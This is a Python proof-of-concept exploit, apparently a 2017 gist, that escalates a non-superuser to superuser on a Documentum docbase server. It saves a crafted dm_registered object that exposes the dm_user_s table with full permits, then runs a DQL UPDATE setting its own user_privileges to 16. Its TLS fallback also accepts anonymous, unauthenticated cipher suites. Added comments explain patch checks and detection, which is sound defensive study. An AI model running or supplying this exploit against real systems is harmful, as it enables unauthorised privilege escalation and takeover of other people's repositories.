Created
March 22, 2017 09:21
#!/usr/bin/env python | |
import socket | |
import sys | |
from os.path import basename | |
from dctmpy.docbaseclient import DocbaseClient | |
from dctmpy.obj.typedobject import TypedObject | |
# OpenSSL cipher string handed to DocbaseClient by the TLS fallback in
# create_session(). "aNULL" admits anonymous (unauthenticated) key-exchange
# suites and "!eNULL" excludes suites with no encryption. With an anonymous
# suite the server's identity is never verified, so the session and the
# password sent over it are exposed to an active man-in-the-middle.
# NOTE(review): presumably needed because the target server offers anonymous
# suites in its secure mode; confirm before reusing this string elsewhere.
CIPHERS = "ALL:aNULL:!eNULL"
def usage():
    """Print the expected command-line arguments for this script.

    The password is a positional argument, so it is visible in the process
    list and shell history of the machine the script runs on.
    """
    script = basename(sys.argv[0])
    print "usage:\n\t%s host port user password" % script
def main():
    """Proof of concept: check whether a non-superuser can raise its own privileges.

    Steps, as visible in the code:
      1. connect with the supplied credentials and stop if the account
         already is a superuser;
      2. ask the server to save a ``dm_registered`` object that registers the
         ``dm_user_s`` table with the widest table permits;
      3. run a DQL ``UPDATE`` through that registration that sets
         ``user_privileges=16`` for the current user.

    What a defender can take from it: step 2 succeeds only when the server
    accepts the save from an unprivileged session, so a patched server is
    expected to make the script stop at the first "Failed". For detection,
    review the repository for ``dm_registered`` objects whose ``table_name``
    is a repository system table, and audit changes to ``user_privileges``.
    """
    if len(sys.argv) != 5:
        usage()
        exit(1)

    host, port, user, password = sys.argv[1:5]
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    (session, docbase) = create_session(host, port, user, password)

    # Nothing to demonstrate if the account already holds the privilege.
    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Acquiring ID for malicious object ..."
    # 25 is presumably the type tag for dm_registered -- TODO confirm.
    object_id = session.next_id(25)
    print "Acquired %s\nTrying to create following malicious object:" % object_id

    # Registration of the user table, owned by the repository owner.
    # NOTE(review): 15 looks like the full table-permit bitmask and 7 like
    # the highest object permit -- confirm against the server documentation.
    registration = TypedObject(session=session)
    registration.set_string("OBJECT_TYPE", "DM_REGISTERED")
    registration.set_bool("IS_NEW_OBJECT", True)
    registration.set_int("i_vstamp", 0)
    registration.set_string("table_name", "dm_user_s")
    registration.set_string("table_owner", docbase)
    registration.set_string("owner_name", docbase)
    registration.set_int("world_permit", 7)
    registration.set_string("object_name", "dm_user_s")
    registration.set_string("r_object_type", "dm_registered")
    registration.set_int("owner_table_permit", 15)
    registration.set_int("group_table_permit", 15)
    registration.set_int("world_table_permit", 15)
    print registration.dump()

    # The server-side authorization decision happens here: a falsy result
    # means the save was refused.
    saved = session.sys_obj_save(object_id, registration)
    if not saved:
        print "Failed"
        exit(1)

    print "Becoming superuser..."
    update = session.query(
        "UPDATE dm_dbo.dm_user_s SET user_privileges=16 "
        "WHERE user_name=USER")
    rows_updated = update.next_record()['rows_updated']
    # Exactly one row (the current user) must have changed.
    if rows_updated != 1:
        print "Failed"
        exit(1)

    print "P0wned!"
def create_session(host, port, user, pwd, identity=None):
    """Open a DocbaseClient session and return ``(session, docbase_name)``.

    A plain connection is tried first. If it fails with ``socket.error``
    errno 54, the connection is retried with ``secure=True`` and the
    module-level ``CIPHERS`` string; any other socket error is re-raised.

    NOTE(review): errno 54 is presumably "connection reset" on the author's
    platform; the number is platform-specific -- confirm.
    The TLS retry uses CIPHERS, which allows anonymous suites, so the server
    is not authenticated and ``pwd`` can be read by a man-in-the-middle.
    """
    print "Trying to connect to %s:%s as %s ..." % \
        (host, port, user)

    # Arguments shared by the plain attempt and the TLS retry.
    connect_args = dict(
        host=host, port=int(port),
        username=user, password=pwd,
        identity=identity)

    session = None
    try:
        session = DocbaseClient(**connect_args)
    except socket.error as e:
        if e.errno != 54:
            raise e
        session = DocbaseClient(
            secure=True, ciphers=CIPHERS,
            **connect_args)

    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
        (host, port, docbase, version)
    return (session, docbase)
def is_super_user(session):
    """Return True when the session's user already has superuser rights.

    Two checks, in order: the user's own ``user_privileges`` equals 16, or
    the user is listed in ``i_all_users_names`` of the ``dm_superusers``
    group. The group is queried only when the first check does not match.
    The same two queries can serve as a privilege audit for an account.
    """
    account = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if account['user_privileges'] == 16:
        return True

    membership = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    return membership is not None
# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()